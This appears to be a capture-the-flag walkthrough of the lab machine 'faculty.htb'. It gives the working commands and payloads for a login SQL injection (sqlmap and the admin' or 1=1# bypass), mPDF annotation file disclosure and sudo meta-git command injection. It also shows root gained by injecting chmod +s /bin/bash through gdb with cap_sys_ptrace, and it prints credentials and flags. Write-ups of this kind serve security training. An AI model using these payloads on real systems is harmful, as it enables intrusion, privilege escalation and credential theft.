Scanning

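# Full TCP port sweep first, then a script/version scan of only the ports found open.
TARGET=10.10.11.169
PORTS=$(nmap -p- --min-rate=1000 -T4 -Pn "$TARGET" \
  | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
# an empty port list would otherwise turn the second scan into a confusing "-p" usage error
[[ -n "$PORTS" ]] || { echo "no open TCP ports found on $TARGET" >&2; exit 1; }
nmap -p"$PORTS" -sC -sV -Pn -vvv "$TARGET" -oN nmap_tcp_all.nmap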

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://faculty.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • domain: faculty.htb (port 80 redirects there; add `10.10.11.169 faculty.htb` to /etc/hosts before the web enumeration below)

Web Enum

# vhost brute force via the Host header; with no --hh/--hc filter every response is printed,
# so "nothing" below means no candidate answered differently from the default vhost
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://faculty.htb/" -H "Host: FUZZ.faculty.htb"
nothing

# -x 401,403 hides those status codes; note /admin/download.php and /admin/home.php answer 200 without a session
> dirsearch -u http://faculty.htb -x 401,403
[18:01:40] 301 -  178B  - /admin  ->  http://faculty.htb/admin/
[18:01:41] 302 -   14KB - /admin/  ->  login.php
[18:01:41] 302 -   14KB - /admin/?/login  ->  login.php
[18:01:41] 200 -   17B  - /admin/download.php
[18:01:41] 200 -    3KB - /admin/home.php
[18:01:41] 302 -   14KB - /admin/index.php  ->  login.php
[18:01:41] 200 -    5KB - /admin/login.php
[18:02:08] 200 -    3KB - /header.php
[18:02:10] 302 -   12KB - /index.php  ->  login.php
[18:02:14] 200 -    5KB - /login.php
[18:02:34] 500 -    0B  - /test.php

# --hl 7 hides 7-line responses (presumably the not-found page); ajax.php and db_connect.php
# exist but return empty bodies, and events.php throws a 500
> wfuzz -c -u http://faculty.htb/admin/FUZZ.php -w /usr/share/wordlists/dirb/common.txt --hl 7
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000371:   200        0 L      0 W        0 Ch        "ajax"
000001069:   200        244 L    513 W      11186 Ch    "courses"
000001173:   200        0 L      0 W        0 Ch        "db_connect"
000001340:   200        1 L      0 W        17 Ch       "download"
000001511:   500        42 L     88 W       1193 Ch     "events"
000001564:   200        218 L    372 W      8532 Ch     "faculty"
000001877:   200        47 L     106 W      2691 Ch     "header"
000001908:   200        105 L    167 W      2995 Ch     "home"
000002017:   302        420 L    809 W      13897 Ch    "index"
000002347:   200        175 L    311 W      5618 Ch     "login"
000003498:   200        201 L    371 W      5553 Ch     "schedule"
000004245:   200        70 L     105 W      1593 Ch     "users"

sqli

  • the admin login handler (/admin/ajax.php?action=login) is vulnerable to SQL injection in the POSTed username/password fields
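# SQL injection in the POSTed login fields. --dbs takes no argument: the backend is
# selected with --dbms, --dbs enumerates databases, and --dump with no -D/-T dumps the
# current database.
sqlmap -u 'http://faculty.htb/admin/ajax.php?action=login' \
  --data 'username=admin&password=test' -p 'username,password' \
  --dbms=mysql --dbs --dump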

1fecbe762af147c1176a0fc2c722a345   (dumped admin password hash: 32 hex chars, presumably unsalted MD5)

admin panel

  • The login form can also be bypassed directly with a boolean-based SQL injection (payload below); after the bypass the panel lands on:
> http://faculty.htb/admin/index.php?page=home
admin' or 1=1#   (entered as the username; the trailing # comments out the rest of the query, so any password is accepted)

Foothold

  • Enumerating the admin panel, there is a PDF export of the course list at http://faculty.htb/admin/index.php?page=courses
  • Intercepting the PDF download request shows the `pdf` POST parameter is just the page content encoded as urlencode → urlencode → base64 (so the server base64-decodes it and then URL-decodes twice).
  • The decoded value is HTML, and the generated PDF is served from /mpdf/tmp, which identifies the library as mPDF. Known mPDF issues (https://snyk.io/vuln/composer:mpdf%2Fmpdf) include local file disclosure through the <annotation> tag; the exact mPDF version in use is not shown here, so this has to be confirmed by testing.
  • So we can reverse the encoding and submit our own HTML containing an <annotation> tag, whose file attribute makes mPDF embed an arbitrary local file as an attachment in the generated PDF:
<annotation file="/etc/passwd" content="<file-to-read>" icon="Graph" title="Attached File: file" pos-x="100" />
  • Encode it the same way the application does (urlencode, urlencode, then base64 — as in the curl command below), submit it as the `pdf` parameter to download.php (or swap it into the intercepted request in Burp), then fetch the resulting http://faculty.htb/mpdf/tmp/<name>.pdf and extract the embedded attachment (e.g. with `pdfdetach`, or by reading the PDF's annotation stream) to recover the file.
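# download.php builds a PDF from the POSTed "pdf" parameter after base64-decoding it and
# URL-decoding twice, so we send an mPDF <annotation> that attaches a local file and the
# server returns the name of the generated PDF under /mpdf/tmp.
# The session must be sent as a cookie (-b). A bare `-H "PHPSESSID=..."` is not a Cookie
# header (curl does not send it as one), so the original request carried no session at all;
# download.php answered 200 without one during dirsearch, so it may not be needed anyway.
SESSION='PHPSESSID=2066jnkf9es4lqdhl20m9grd65'

# $1: absolute path on the target to embed; prints the generated PDF name.
# "urlencode" is a CLI URL-encoder (e.g. the one from gridsite-clients on Kali).
mpdf_include() {
  local path=$1
  local payload
  payload="<annotation file=\"$path\" content=\"file\" icon=\"Graph\" title=\"Attached File: file\" pos-x=\"195\" />"
  # encoding order expected by the server: urlencode twice, then base64
  curl -s http://faculty.htb/admin/download.php -b "$SESSION" \
    --data "pdf=$(urlencode "$(urlencode "$payload")" | base64 -w0)"
}

mpdf_include /etc/nginx/sites-enabled/default   # -> OKZN7RKrUqQD08tofdFy1CkLcE.pdf
curl -s http://faculty.htb/mpdf/tmp/OKZN7RKrUqQD08tofdFy1CkLcE.pdf --output file.pdf
# from /etc/nginx/sites-enabled/default, locate the backend code and read the db password from db_connect.php
mpdf_include /var/www/scheduling/admin/db_connect.php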
  • gbyolo:Co.met06aci.dly53ro.per  (DB credentials from db_connect.php; the same password is reused for the gbyolo shell login below — credential reuse)

pe1

> gbyolo@faculty:/home$ sudo -l
Matching Defaults entries for gbyolo on faculty:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User gbyolo may run the following commands on faculty:
    (developer) /usr/local/bin/meta-git
# meta-git evidently hands the clone argument to a shell, so everything after the pipe runs
# as developer (OS command injection); "meow" is only a dummy repository name
> sudo -u developer /usr/local/bin/meta-git clone 'meow | ls -la developer/.ssh'
  • The listing shows developer's .ssh directory; the same injection can read the private key (presumably `cat developer/.ssh/id_rsa`), which gives an SSH login as developer. The user flag is c499b72fb4a38e52450186c613581508

pe2

  • linpeas enum
# https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities
Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/gdb = cap_sys_ptrace+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
  • /usr/bin/gdb carries cap_sys_ptrace, so it can attach to a process owned by root and execute code in its context; the python3 networkd-dispatcher (PID 725 below) is a convenient target. developer is in the `debug` group (see the id output further down), which is possibly what grants access to this gdb — worth confirming with `ls -l /usr/bin/gdb`.
# find a root-owned process to attach to with the cap_sys_ptrace gdb; PID 725 (python3 networkd-dispatcher) runs as root
> ps aux | grep python
root         725  0.0  0.9  26896 18000 ?        Ss   Oct02   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
develop+   54718  0.0  0.0   5192   656 pts/0    S+   02:54   0:00 grep python

> gdb -p 725

(gdb) call (void)system("chmod +s /bin/bash")
[Detaching after vfork from child process 21373]
(gdb) quit
  • The injected system() call ran as root and set the SUID bit on /bin/bash; `bash -p` then keeps the effective uid 0 instead of dropping privileges:
developer@faculty:~$ bash -p
bash-5.0# id
uid=1001(developer) gid=1002(developer) euid=0(root) egid=0(root) groups=0(root),1001(debug),1002(developer),1003(faculty)
bash-5.0# cat /root/root.txt 
1479beb5d02e06ebf2c77ea791aac120